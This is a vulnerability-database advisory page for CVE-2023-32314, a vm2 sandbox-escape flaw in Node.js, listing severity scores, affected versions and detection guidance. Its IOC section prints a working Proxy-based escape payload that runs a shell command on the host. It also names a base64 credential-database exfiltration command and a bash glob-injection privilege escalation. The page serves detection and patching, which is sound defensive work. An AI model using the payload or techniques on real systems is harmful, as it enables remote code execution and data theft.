cbcvebase.
CVE-2023-32314
published 2023-05-15

CVE-2023-32314: vm2 is a sandbox that can run untrusted code with Node's built-in modules. A sandbox escape vulnerability exists in vm2 for versions up to and including…

PriorityP273critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
EPSS
5.60%
91.9th percentile
vm2 is a sandbox that can run untrusted code with Node's built-in modules. A sandbox escape vulnerability exists in vm2 for versions up to and including 3.9.17. It abuses an unexpected creation of a host object based on the specification of `Proxy`. As a result a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Affected

3 ranges
VendorProductVersion rangeFixed in
patriksimekvm2< 3.9.183.9.18
vm2_projectvm2< 3.9.183.9.18
vm2_projectvm2>= 0 < 3.9.183.9.18

Detection & IOCsextracted from sources · hover to see the quote

commandconst err = new Error(); err.name = { toString: new Proxy(() => "", { apply(target, thiz, args) { const process = args.constructor.constructor("return process")(); throw process.mainModule.require("child_process").execSync("ping -c1 10.10.14.14").toString(); }, }), }; try { err.stack; } catch (stdout) { stdout; }
urlhttps://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac
port3000
  • CVE-2023-32314 exploit abuses Proxy-based host object creation in vm2 ≤3.9.17; detect JavaScript payloads calling `args.constructor.constructor("return process")()` within vm2 sandbox contexts to identify sandbox escape attempts.
  • Monitor for `process.mainModule.require("child_process").execSync(...)` patterns in code submitted to vm2-backed Node.js sandboxes (e.g., on port 3000), as this is the RCE execution chain used post-escape.
  • Alert on `base64 -w0 /var/www/contact/tickets.db` or similar base64 exfiltration commands executed on the host, indicating post-exploitation data theft of the SQLite credential store.
  • Detect bash glob/wildcard injection against scripts using unquoted `==` comparisons in `[[ ]]` conditionals (e.g., supplying `a*` as input) — a privilege escalation technique used against `/opt/scripts/mysql-backup.sh` running as root.
  • ·The vm2 sandbox escape (CVE-2023-32314) affects all versions up to and including 3.9.17; version 3.9.18 contains the patch. The observed vulnerable deployment used version 3.9.16.
  • ·No known workarounds exist for CVE-2023-32314; upgrading to vm2 ≥3.9.18 is the only remediation.

CVSS provenance

nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vendor_redhat9.8CRITICAL
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.